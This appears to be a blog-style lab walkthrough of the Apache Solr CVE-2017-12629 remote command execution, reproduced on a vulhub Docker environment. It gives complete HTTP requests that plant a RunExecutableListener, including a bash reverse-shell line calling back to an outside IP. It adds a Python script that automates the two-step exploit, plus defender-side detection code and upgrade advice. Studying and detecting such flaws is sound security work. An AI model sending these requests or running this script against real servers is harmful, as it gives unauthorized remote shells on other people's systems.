Learning the Apache Solr XML entity injection vulnerability (CVE-2017-12629)

信息安全不简单鸭 2024-08-04 20:36:31

This lab has two stages: first, write a file on the target; second, get a reverse shell. Despite the title, both stages use the remote command execution half of CVE-2017-12629 (an unauthenticated Config API request that registers a solr.RunExecutableListener), not the XML entity injection half. Apache Solr is an open-source search server written in Java and built on HTTP and Apache Lucene: documents are added to a collection by posting XML (or JSON) over HTTP, and the collection is queried over HTTP with results returned as XML/JSON. Solr versions before 7.1.0 (fixed in 7.1.0 and 6.6.2) carry two vulnerabilities that share the identifier CVE-2017-12629: an XML external entity (XXE) vulnerability in the xmlparser query parser and a remote command execution (RCE) vulnerability through the Config API; the two can be chained.[1]


Prerequisites: have Docker and docker-compose ready, clone vulhub, and enter the solr/CVE-2017-12629-RCE directory, then start reproducing the vulnerability:

docker-compose build    # optional
docker-compose up -d

After finishing the lab, remember to tear the environment down:

docker-compose down
docker system prune -a -f    # optional

Browsing to port 8983 on the host shows the Solr admin interface, which confirms that the Apache Solr CVE-2017-12629 environment is up.

First register a listener through the Config API. `exe` is the program to run, `args` are its arguments and `dir` is the working directory. In vulnerable versions this endpoint needs no authentication, and solr.RunExecutableListener runs the program every time the chosen event (here postCommit) fires:

POST /solr/demo/config HTTP/1.1
Host: 144.34.162.13:8983
Connection: close
Content-Length: 158

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}

Then post an update to trigger the listener just added. postCommit fires when the update is committed, so if the file does not appear immediately, wait for Solr's autoCommit interval (15 seconds in the default solrconfig) or send the update to /solr/demo/update?commit=true to commit at once:

POST /solr/demo/update HTTP/1.1
Host: 144.34.162.13:8983
Content-Type: application/json
Content-Length: 15
Connection: close

[{"id":"test"}]

Enter the container (docker exec -it <container> bash) and confirm that /tmp/success has been created.

Now the reverse shell. Start a listener on the attacking host first (174.137.58.6 in the request below), for example nc -lvnp 8888, then register a second listener under a fresh name (newlistener is still registered) whose command is a bash reverse-shell one-liner:

POST /solr/demo/config HTTP/1.1
Host: 144.34.162.13:8983
Connection: close
Content-Length: 185

{"add-listener":{"event":"postCommit","name":"newlistener3","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/174.137.58.6/8888 0>&1"]}}

Then trigger it with another update:

POST /solr/demo/update HTTP/1.1
Host: 144.34.162.13:8983
Content-Type: application/json
Content-Length: 15
Connection: close

[{"id":"test"}]

The reverse shell connects back to port 8888 and we have a shell inside the Solr container. Note that the listener stays in the core's config overlay until it is removed, so every later commit spawns the command again; clean up with the Config API's delete-listener command when done. On the defensive side, check each core's /config/overlay for solr.RunExecutableListener entries, and upgrade: Solr 7.1.0 and 6.6.2 disable RunExecutableListener by default.
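As an added example (not code from the original post or from vulhub), here is the two-step procedure above in Python together with the defender-side check. build_add_listener and build_trigger_update produce the Config API and update bodies shown in the requests; run_command sends them (against your own lab only; base_url and core are whatever you are running, and commit=true is Solr's documented update parameter for committing immediately); find_executable_listeners walks a core's /config/overlay JSON for solr.RunExecutableListener entries. SAMPLE_OVERLAY is a constructed response and its layout is an assumption about how Solr serialises add-listener entries; the finder walks the whole document, so it does not depend on that layout.

```python
# Added example, not code from the original post or from vulhub.
# Exploit side: builds and sends the Config API / update bodies used above.
# Defender side: finds RunExecutableListener entries in a core's config overlay.
import json
import urllib.request

LISTENER_CLASS = "solr.RunExecutableListener"


def build_add_listener(name, exe, args, directory="/bin/", event="postCommit"):
    """Body for POST /solr/<core>/config: registers a RunExecutableListener
    that runs `exe args...` each time `event` fires."""
    return {"add-listener": {
        "event": event, "name": name, "class": LISTENER_CLASS,
        "exe": exe, "dir": directory, "args": list(args)}}


def build_trigger_update(doc_id="test"):
    """Body for POST /solr/<core>/update: indexing a document and committing
    it fires the postCommit listeners."""
    return [{"id": doc_id}]


def post_json(url, payload, timeout=10):
    """POST a JSON body and return the decoded JSON response (network helper)."""
    data = json.dumps(payload).encode()
    req = urllib.request.Request(
        url, data=data, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read().decode())


def run_command(base_url, core, name, command):
    """Two-step exploit against a vulnerable lab core: register the listener,
    then push an update with commit=true so postCommit fires at once instead
    of waiting for autoCommit. base_url/core are assumed lab values."""
    post_json(f"{base_url}/solr/{core}/config",
              build_add_listener(name, "sh", ["-c", command]))
    return post_json(f"{base_url}/solr/{core}/update?commit=true",
                     build_trigger_update())


def find_executable_listeners(obj, _path=()):
    """Return every mapping anywhere in `obj` whose class is
    solr.RunExecutableListener, with the JSON path where it was found.
    Run it over GET /solr/<core>/config/overlay to spot listeners planted
    through the Config API; it walks the whole document, so it does not
    rely on any particular overlay layout."""
    hits = []
    if isinstance(obj, dict):
        if obj.get("class") == LISTENER_CLASS:
            hits.append({"path": "/".join(_path), "name": obj.get("name"),
                         "exe": obj.get("exe"), "dir": obj.get("dir"),
                         "args": obj.get("args", []), "event": obj.get("event")})
        for key, value in obj.items():
            hits.extend(find_executable_listeners(value, _path + (str(key),)))
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            hits.extend(find_executable_listeners(value, _path + (str(i),)))
    return hits


def check_core(base_url, core):
    """Fetch a core's config overlay and return the suspicious listeners."""
    with urllib.request.urlopen(f"{base_url}/solr/{core}/config/overlay",
                                timeout=10) as resp:
        return find_executable_listeners(json.loads(resp.read().decode()))


# Constructed sample of what /config/overlay could return after the first
# request in the post was accepted. The layout is an assumption.
SAMPLE_OVERLAY = {
    "responseHeader": {"status": 0, "QTime": 1},
    "overlay": {
        "znodeVersion": 0,
        "listener": {
            "newlistener": {
                "event": "postCommit", "name": "newlistener",
                "class": LISTENER_CLASS, "exe": "sh", "dir": "/bin/",
                "args": ["-c", "touch /tmp/success"]}}}}

if __name__ == "__main__":
    for hit in find_executable_listeners(SAMPLE_OVERLAY):
        print(f"{hit['path']}: {hit['exe']} {' '.join(hit['args'])} on {hit['event']}")
```

Against a live core, check_core("http://144.34.162.13:8983", "demo") returns the same structure for whatever the Config API has stored; an empty list on every core is the state to expect after cleanup. The recursive walk is deliberate: matching on the class string rather than on a fixed path means a listener registered under a different event, or an overlay serialised differently by another Solr version, is still reported.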

References: [1] Apache Solr remote command execution vulnerability (CVE-2017-12629) https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
